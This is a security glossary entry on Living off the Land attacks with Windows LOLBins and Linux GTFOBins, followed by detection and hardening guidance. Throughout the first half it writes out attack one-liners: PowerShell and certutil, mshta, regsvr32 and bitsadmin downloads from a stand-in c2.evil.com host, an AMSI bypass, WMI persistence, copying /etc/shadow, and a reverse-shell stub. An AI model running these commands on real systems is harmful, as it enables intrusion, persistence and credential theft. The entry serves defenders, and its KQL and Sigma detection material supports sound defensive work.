Angriffstechniken Glossary
Living off the Land (LotL) - LOLBins und LOLBas
"Living off the Land" (LotL) refers to attack techniques in which attackers use only legitimate tools and utilities already present on the system (LOLBins = Living off the Land Binaries) instead of their own malware. By using PowerShell, WMI, certutil, regsvr32, mshta, and other built-in Windows tools, attackers evade antivirus detection and make forensic attribution more difficult. MITRE ATT&CK; T1218 (System Binary Proxy Execution).
Living off the Land is the stealth concept used by modern attackers: no custom malware that could be detected—instead, exploiting the operating system against itself. PowerShell is a command-line interpreter for administrators—and for attackers. certutil is a certificate management tool—and a downloader. WMI is a management interface—and a persistence technique. LOLBins turn every Windows computer into a potential attacker’s tool.
LOLBins – Living off the Land Binaries
Known LOLBins and their potential uses:
PowerShell (powershell.exe / pwsh.exe):
MITRE: T1059.001
Intended purpose: Scripting, administration
Exploitation:
# Encoded Command (Base64) – avoids logging:
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AC...
# = Invoke-WebRequest http://c2.evil.com/payload.exe -OutFile shell.exe
# AMSI bypass:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|
?{$_}|%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}
# PowerShell Remoting for lateral movement:
Invoke-Command -ComputerName DC01 -ScriptBlock {whoami}
Enter-PSSession -ComputerName FileServer01
# Download + Execute (without file on disk):
IEX (New-Object Net.WebClient).DownloadString('http://c2.evil.com/payload.ps1')
WMI (Windows Management Instrumentation):
MITRE: T1047
Legitimate Purpose: Hardware queries, software management
Exploitation:
# Remote Process Execution:
wmic /node:192.168.1.10 /user:domain\admin /password:Pass123
process call create "cmd.exe /c calc.exe"
# Persistence via WMI Event Subscription:
# (Starts on system events – survives reboots!)
wmic /namespace:"\\root\subscription" path __EventFilter
create Name="PersistFilter", EventNamespace="root\cimv2",
QueryLanguage="WQL", Query="SELECT * FROM Win32_ModuleLoadTrace"
CertUtil (certutil.exe):
MITRE: T1105 (Ingress Tool Transfer)
Normal purpose: Certificate management, PKI
Misuse:
# Download files (bypasses simple proxy filters!):
certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" payload.exe
# Base64 decoding:
certutil.exe -decode encoded.txt payload.exe
# (Attacker delivers Base64-encoded payload as a .txt file)
# Clearing the URL cache (covering tracks):
certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" delete
MSHta (mshta.exe):
MITRE: T1218.005
Normal purpose: HTML Application Host (HTA files)
Abuse:
# Execute remote HTA:
mshta.exe "http://c2.evil.com/evil.hta"
# HTA = HTML + VBScript/JScript → full script access!
# Phishing: "Please open the HTA file" instead of .exe → often not blocked
regsvr32 (regsvr32.exe):
MITRE: T1218.010
Normal purpose: Register COM objects
Abuse (Squiblydoo):
# Load and execute a remote COM object:
regsvr32.exe /s /n /u /i:"http://c2.evil.com/evil.sct" scrobj.dll
# → SCT file contains JScript/VBScript
# → regsvr32 is signed by Microsoft → often bypasses AppLocker!
rundll32 (rundll32.exe):
MITRE: T1218.011
Normal purpose: Call DLL function
Abuse:
# Load URL to JavaScript as a DLL:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...
# Execute custom DLL:
rundll32.exe C:\Users\Public\evil.dll,EntryPoint
wscript / cscript:
MITRE: T1059.005
Normal purpose: Execute VBScript/JScript
Abuse:
wscript.exe //B "\\share\payload.vbs" # Silent mode, no dialogs
BitsAdmin (bitsadmin.exe):
MITRE: T1197
Normal Purpose: Background Intelligent Transfer Service (Windows Update)
Abuse:
# Download:
bitsadmin /transfer "WindowsUpdate" /download /priority high
"http://c2.evil.com/payload.exe" "C:\Windows\Temp\payload.exe"
# Persistence: BITS jobs survive reboots!LOLBas - Living off the Land-Based Scripts
Beyond Binaries - Scripts and Built-in Features:
Excel/Office Macros (MITRE T1566.001):
→ Phishing: .xlsm, .docm attachment with macro
→ Macro: certutil download + PowerShell execute
→ Modern: also possible in ODF, LibreOffice
Outlook Home Page Attack:
→ Registry: Set Outlook home page to evil.com
→ Persistence: Website loads every time Outlook starts
DLL Hijacking:
→ Legitimate application loads DLL from an insecure path
→ Attacker places their own DLL in the desired location
→ Application loads attacker’s DLL (self-signing not required!)
LOLBAS Reference:
→ lolbas-project.github.io: complete list of all known LOLBins
→ 250+ documented Windows binaries with exploitation examples
→ Categories: Execute, Download, Upload, Compile, Copy, Decode
GTFOBins (Linux equivalent):
→ gtfobins.github.io: LOLBins for Linux
→ SUID exploitation, Sudo escape, capability usage
Examples:
# awk as a shell:
awk 'BEGIN {system("/bin/sh")}'
# tar for file exfiltration:
tar -cf /tmp/loot.tar /etc/shadow
# Python for reverse shell:
python3 -c 'import socket,os,pty;s=socket.socket(...)'Detection of LotL attacks
How EDR/SIEM detects LotL attacks:
Enable PowerShell logging:
# Group Policy: Computer Configuration → Administrative Templates → Windows Components → PowerShell
Turn on Module Logging: ENABLED (all commands)
Turn on PowerShell Script Block Logging: ENABLED (including obfuscated scripts)
Turn on Transcription: ENABLED (everything in log file)
# Event Log: Microsoft-Windows-PowerShell/Operational
# Event ID 4104: Script Block Logging (the actual command content)
# Event ID 4103: Module Logging
# Suspicious PowerShell patterns (Sentinel KQL):
SecurityEvent
| where EventID == 4104
| where ScriptBlockText contains_any
("FromBase64String", "IEX", "Invoke-Expression",
"DownloadString", "WebClient", "AmsiUtils",
"Bypass", "HideWindow", "EncodedCommand")
| project TimeGenerated, Computer, ScriptBlockText
WMI Monitoring:
# Sysmon Event ID 19-21: WMI Event Subscription
# Event ID 20: WMI EventFilter + Consumer: Persistence!
Get-WMIObject -Namespace "root\subscription" -Class __EventFilter
# → If there are unknown filters: Investigate!
Sigma rule for LotL:
title: Living off the Land - CertUtil Download
id: xxx
status: stable
description: CertUtil used for file download (LOLBin abuse)
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- '-urlcache'
- '-split'
- 'http'
condition: selection
level: medium
tags:
- attack.ingress_tool_transfer
- attack.t1105
EDR Detection Mechanisms:
→ Behavioral Detection: PowerShell → Network → Exec → Persistence = Suspicious!
→ Process Tree: Word.exe → powershell.exe → curl.exe → SUSPICIOUS
→ Script Analysis: PowerShell script block is checked against patterns
→ API Monitoring: Suspicious API calls (VirtualAlloc + WriteProcessMemory)
→ Parent-Child Anomalies: Excel spawns cmd.exe → ALERT!
Hardening against LotL:
□ PowerShell: Enforce Constrained Language Mode
[System.Management.Automation.PSConstrainedLanguageMode]::Enter()
# Drastically limits PowerShell capabilities
□ WDAC (Windows Defender Application Control):
→ Run only signed applications (AppLocker successor)
→ LOLBins can be explicitly blocked (e.g., mshta.exe)
□ Attack Surface Reduction (ASR) Rules (Microsoft Defender):
Block abuse of exploited vulnerable signed drivers
Block credential theft from LSASS
Block Office applications from spawning child processes
Block execution of potentially obfuscated scripts
□ Logging: Enable Script Block Logging + Process Command Line Logging
□ Monitoring: EDR with behavioral detection (CrowdStrike, Defender for Endpoint)
